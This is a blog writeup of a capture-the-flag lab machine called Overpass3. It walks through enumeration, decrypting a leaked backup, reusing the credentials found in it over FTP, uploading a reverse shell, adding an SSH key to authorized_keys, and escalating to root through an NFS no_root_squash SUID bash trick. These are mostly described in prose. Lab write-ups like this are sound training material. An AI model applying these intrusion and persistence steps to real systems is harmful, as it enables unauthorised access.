Overpass3 Writeup

 


Overpass3 link
Enumeration


First lets run an nmap scan to take a look at what services are exposed.



As can be seen above there are 3 ports exposed, 21(ftp),22(ssh) and 80(http).

First lets take a look at what's being hosted on the webserver on port 80








Pretty basic webpage, nothing of interest here. Quickly looking through the page source there's not really anything hidden overly interesting, just a comment about the uptime but it's not useful.

Moving on let's use gobuster to see what if there's any hidden directories or files.












Interesting, there appears to be a directory called /backups/, lets take a look at what's there.











Looks like there's a file with something backed up inside, lets download the file and unzip it.









Looks like we have a excel file in the form of xlsx that has been encrypted using gpg, luckily, we seem to also have the private key, lets un-encrypt the file and take a look at what's inside the spreadsheet.



















Looks like we have some credentials, lets try these against the ftp server to see if we can access it.











Success! Looks like trying the first set of credentials gave us access to the ftp server, lets take a look at what goodies we have.









Interesting, looks like we have access to the webserver files, this is most likely our initial access point but first a quick test to make sure none of the credentials we discovered will give us access to ssh.

And nope, won't even bother showing you, but ssh doesn't work, although the user paradox does display a different message to the other two users who return incorrect password.








Back to ftp it is then, seeing we have access to the webserver we should be able to upload a reverse shell, lets give it a shot.








Initial Access

Now lets open up a netcat listener and navigate to our reverse shell by going to /reverse.php









A note about the above, I have prefixed my netcat listener with rlwrap, this allows me to have some tty functionality such as the ability to navigate through the terminal history, but we still need to further stabilize, you don't have to use rlwrap, it's just a preference of mine.












Now we have a much more stable socat shell.
First thing we can do is switch over to the paradox user using su.





First thing I like to always do is a quick sudo -l, which in this case entering the password returns a message stating we can't run sudo on this machine, so next I like to always get linpeas on the machine and let it do a quick enumeration for me.






A quick look through brings up some interesting stuff but no web flag is found so lets try using find to see if we can find any flags at all.












Sure enough, looks like our flag is located at /usr/share/httpd/web.flag, a quick cat on the file returns us our first flag. Now back to the good stuff.







Looks like we have a nfs share, nmap didn't seem to return one being exposed though so lets take a quick look and see what linpeas returned was running on any of the ports.












Port 2049 is the default nfs port and it looks like it's running but it's only exposed locally, which makes sense why nmap didn't show it. A quick test of using socat to port forward the local port seems to not work as we end up with a filtered port and aren't able to access the share, lets setup ssh so that we can use that to port forward.









First we use ssh-keygen -f paradox to generate an ssh key on our machine, we can then use cat on the paradox.pub file, copy what is printed in the terminal, then on the paradox remote session we can use echo "[paradox.pub contents]" >> /home/paradox/.ssh/authorized_keys

PrivEsc


Now we can create a ssh port forward so that the nfs share gets expose locally to our machine, we could also swap over to ssh for connecting to the paradox account but there isn't overly much point as we will hopefully be moving onto using the james account.




We can now make a new directory to mount to and then mount james' home directory and hopefully find out user flag.










And sure enough we have our user flag, lets run cat on the file and enter our second flag in.
Now that we have james' home directory and it has the no_root_squash on it we can very easily get root on the machine, first we need to check the .ssh folder and see if we have a private key listed.











And sure enough we do, seeing the drives mounted on our machine we can just use the key directly without having to download it.




First thing we want to do is copy the local /bin/bash into james' home directory, the reason we need to use the version that is stored on the machine is because if we tried copying the binary from our machine it may use later versions of GLIBC and result in errors preventing us from running it.



After we can go back to our machine and switch to the root account, copy the bash binary to a new file so that it is belonging to the root user and add the suid bit to the binary.






Finally all we now need to do is head back to our ssh session on james' account and run bash -p on the newly created bash binary and use root to get the root flag.



Comments

Post a Comment

Popular posts from this blog

Biteme Writeup

Image
  Biteme link Enumeration Firing up nmap we can see that we have 2 ports open, 22(ssh) and 80(http), let's take a quick look at the webserver first and see what's running on it. Just the default apache page, lets run gobuster and see if we can find any directories. Looking at gobuster we only seem to have the one directory, /console/  so let's take a look at that, we may need to possibly run a bigger wordlist later if we can't net anything from this. Interesting, we have a login page with a captcha, taking a quick look at the page source doesn't reveal any hidden details so let's take a look at what happens and what data is submitted when we attempt to login. Interesting, it seems there was a message logged to the console when we attempted to sign in stating that php file syntax highlighting has been turned on. We can also see that when we submit a sign in attempt there is an extra variable of clicked = yes. Lets run a quick gobuster scan on the console director...
Read more

0day Writeup

Image
  0day link Enumeration Running an initial nmap scan we can see that we have port 80 and 22 open, so lets start by taking a look at the website to see what we have. Nothing exciting on the main page and looking into the page source we don't have much so lets run gobuster and see what that brings us back. Gobuster returns a whole bunch of interesting directories, we'll start by looking at robots.txt just incase there's anything extra listed in their that gobuster didn't find and then we'll slowly start working through each of the folders that returned a 301 redirect. Nothing really interesting on any of the directories, mainly looks to be a bunch of rabbit holes, the /backup/  directory did have a private rsa key in it though which we'll copy and save for later just incase, but we don't have a known user that it could be associated with so it's not much use. Next step would be to look for exploits, usually with /cgi-bin/  exposed we'd be hoping for an...
Read more

Olympus Writeup

Image
  Olympus link Enumeration Starting off with a nmap scan we can see that we have two ports open, 22(ssh) and 80(http), let's start by taking a look at the web server first. Looks like we instantly get redirected to olympus.thm so we need to make sure we add this to our /etc/hosts  file. Once we get to the website we can see that there is a message letting us know that we can still visit the old version of the website on this domain, so lets run gobuster and see if we can find a directory that will take us there. Taking a look at the gobuster scan we can see that we have a /~webmaster/  directory so we should go check that out, we can also see that the site is running a mysql db based on the /phpmyadmin/ Looks like we have a pretty basic CMS system, there's some interesting details on this page other than the Admin and Register links, we should probably go look for that wordlist quickly, we can also run another gobuster scan on this directory as well to see if we find anyt...
Read more